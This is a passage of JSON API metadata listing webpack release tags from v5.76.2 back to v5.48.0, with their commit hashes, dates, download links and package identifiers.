v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"n